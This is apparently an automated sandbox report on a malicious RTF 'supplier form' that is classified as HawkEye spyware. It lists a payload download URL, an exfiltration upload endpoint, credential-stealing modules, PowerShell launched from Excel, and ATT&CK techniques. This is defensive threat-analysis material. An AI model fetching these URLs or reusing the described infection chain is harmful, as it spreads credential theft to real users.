Loading ...

Play interactive tourEdit tour

Analysis Report Suppliers+Form+for+ARVIGOR+TRADING+and+Co+4004322.rtf

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:202547
Start date:22.01.2020
Start time:03:14:58
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 12m 49s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Suppliers+Form+for+ARVIGOR+TRADING+and+Co+4004322.rtf
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Potential for more IOCs and behavior
Number of analysed new started processes analysed:41
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.expl.evad.winRTF@72/69@1/1
EGA Information:
  • Successful, ratio: 80%
HDC Information:Failed
HCA Information:
  • Successful, ratio: 68%
  • Number of executed functions: 311
  • Number of non-executed functions: 185
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .rtf
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Active ActiveX Object
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 13.74.179.117, 20.185.109.208, 13.83.148.235, 20.36.218.70, 13.107.3.128, 13.107.5.88, 52.109.76.6, 52.109.12.19, 52.109.124.18, 52.114.88.28, 52.114.158.92, 52.114.128.9, 52.114.32.7, 52.109.120.19, 40.90.22.189, 40.90.22.192, 40.90.22.184, 51.105.249.239
  • Excluded domains from analysis (whitelisted): fe2.update.microsoft.com.nsatc.net, client-office365-tas.msedge.net, lgin.msa.trafficmanager.net, am3p.wns.notify.windows.com.akadns.net, mobile.pipe.aria.microsoft.com, e-0009.e-msedge.net, wns.notify.windows.com.akadns.net, prd.col.aria.mobile.skypedata.akadns.net, login.live.com, emea1.notify.windows.com.akadns.net, sls.update.microsoft.com, officeclient.microsoft.com, pipe.prd.skypedata.akadns.net, config.edge.skype.com, pipe.cloudapp.aria.akadns.net, client.wns.windows.com, afdo-tas-offload.trafficmanager.net, sls.update.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, s-0001.s-msedge.net, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, sls.emea.update.microsoft.com.akadns.net, fe2.update.microsoft.com, pipe.skype.com, fe-by01p-msa.trafficmanager.net, config.officeapps.live.com, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
HawkEye
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation111Application Shimming1Extra Window Memory Injection1Software Packing1Credential Dumping1System Time Discovery1Application Deployment SoftwareData from Local System1Data Encrypted1Standard Cryptographic Protocol12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaScripting1Port MonitorsProcess Injection42Disabling Security Tools1Network SniffingSecurity Software Discovery43Remote ServicesClipboard Data1Exfiltration Over Other Network MediumRemote Access Tools1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesPowerShell3Accessibility FeaturesApplication Shimming1Deobfuscate/Decode Files or Information1Input CaptureFile and Directory Discovery3Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API1System FirmwareDLL Search Order HijackingScripting1Credentials in FilesSystem Information Discovery110Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol2SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution13Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information2Account ManipulationVirtualization/Sandbox Evasion13Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceExtra Window Memory Injection1Brute ForceProcess Discovery4Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentCommand-Line Interface1Path InterceptionScheduled TaskMasquerading1Two-Factor Authentication InterceptionApplication Window Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionModify Registry1Bash HistoryRemote System Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessVirtualization/Sandbox Evasion13Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationProcess Injection42KeychainProcess DiscoveryTaint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsDLL Side-Loading1Private KeysSecurity Software DiscoveryReplication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://a.pomf.cat/URL Reputation: Label: malware
Found malware configurationShow sources
Source: RegAsm.exe.1516.30.memstrMalware Configuration Extractor: HawkEye {"Modules": ["browserpv", "mailpv", "WebBrowserPassView"], "Version": ""}
Multi AV Scanner detection for domain / URLShow sources
Source: http://pomf.cat/upload.phpVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\qCXSc.ExeVirustotal: Detection: 32%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Suppliers+Form+for+ARVIGOR+TRADING+and+Co+4004322.rtfVirustotal: Detection: 17%Perma Link
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 33.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 30.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 35_2_0040A1A7 FindFirstFileW,FindNextFileW,35_2_0040A1A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 36_2_0040A1A7 FindFirstFileW,FindNextFileW,36_2_0040A1A7
Enumerates the file systemShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Allocates a big amount of memory (probably used for heap spraying)Show sources
Source: excel.exeMemory has grown: Private usage: 6MB later: 58MB
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: pivotpower24.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.5:49731 -> 67.222.158.172:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.5:49731 -> 67.222.158.172:443

Networking:

barindex
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Found strings which match to known social media urlsShow sources
Source: vbc.exe, 00000023.00000003.1980691321.0000000000959000.00000004.00000001.sdmp, vbc.exe, 00000024.00000002.2021151533.0000000000A79000.00000004.00000040.sdmpString found in binary or memory: :///C:/Users/user/Desktop/Suppliers+Form+for+ARVIGOR+TRADING+and+Co+4004322.rtfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login+ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000023.00000003.1980691321.0000000000959000.00000004.00000001.sdmp, vbc.exe, 00000024.00000002.2021151533.0000000000A79000.00000004.00000040.sdmpString found in binary or memory: :///C:/Users/user/Desktop/Suppliers+Form+for+ARVIGOR+TRADING+and+Co+4004322.rtfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login+ equals www.yahoo.com (Yahoo)
Source: RegAsm.exe, 0000001E.00000002.2310328264.0000000002FC0000.00000004.00000001.sdmp, RegAsm.exe, 00000021.00000002.2317149038.00000000099D0000.00000004.00000001.sdmp, vbc.exe, 00000023.00000002.1984212977.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000024.00000002.2010056735.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: RegAsm.exe, 0000001E.00000002.2310328264.0000000002FC0000.00000004.00000001.sdmp, RegAsm.exe, 00000021.00000002.2317149038.00000000099D0000.00000004.00000001.sdmp, vbc.exe, 00000023.00000002.1984212977.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000024.00000002.2010056735.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: pivotpower24.com
Urls found in memory or binary dataShow sources
Source: RegAsm.exe, 00000021.00000002.2315064614.0000000003290000.00000004.00000001.sdmpString found in binary or memory: http://bot.whatismyipaddress.com/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: RegAsm.exe, 0000001E.00000002.2310328264.0000000002FC0000.00000004.00000001.sdmp, RegAsm.exe, 00000021.00000002.2315064614.0000000003290000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php
Source: RegAsm.exe, 0000001E.00000002.2306998175.0000000000402000.00000040.00000001.sdmp, RegAsm.exe, 00000021.00000002.2312568414.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
Source: RegAsm.exe, 0000001E.00000002.2310328264.0000000002FC0000.00000004.00000001.sdmp, RegAsm.exe, 00000021.00000002.2315064614.0000000003290000.00000004.00000001.sdmpString found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: vbc.exe, 00000023.00000002.1982365442.0000000000192000.00000004.00000010.sdmp, vbc.exe, 00000024.00000002.2008833765.0000000000192000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
Source: vbc.exeString found in binary or memory: http://www.nirsoft.net/
Source: RegAsm.exe, 0000001E.00000002.2310328264.0000000002FC0000.00000004.00000001.sdmp, RegAsm.exe, 00000021.00000002.2315064614.0000000003290000.00000004.00000001.sdmpString found in binary or memory: https://a.pomf.cat/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://api.aadrm.com/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://api.onedrive.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://augloop.office.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://cdn.entity.
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://clients.config.office.net/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://config.edge.skype.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/documentvirality/prod/index.html
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.html
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://cr.office.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://devnull.onenote.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://directory.services.
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://graph.windows.net
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://graph.windows.net/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://lifecycle.office.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://login.windows.local
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://management.azure.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://management.azure.com/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://messaging.office.com/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://officeapps.live.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://onedrive.live.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: PowerShell_transcript.216041.ispmsZla.20200122031715.txt.37.drString found in binary or memory: https://pivotpower24.com/mytbay/pikin/pikin.exe
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://powerlift.acompli.net
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://settings.outlook.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://tasks.office.com
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: A0F02BA0-94EE-4096-B05A-78A738AB1829.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
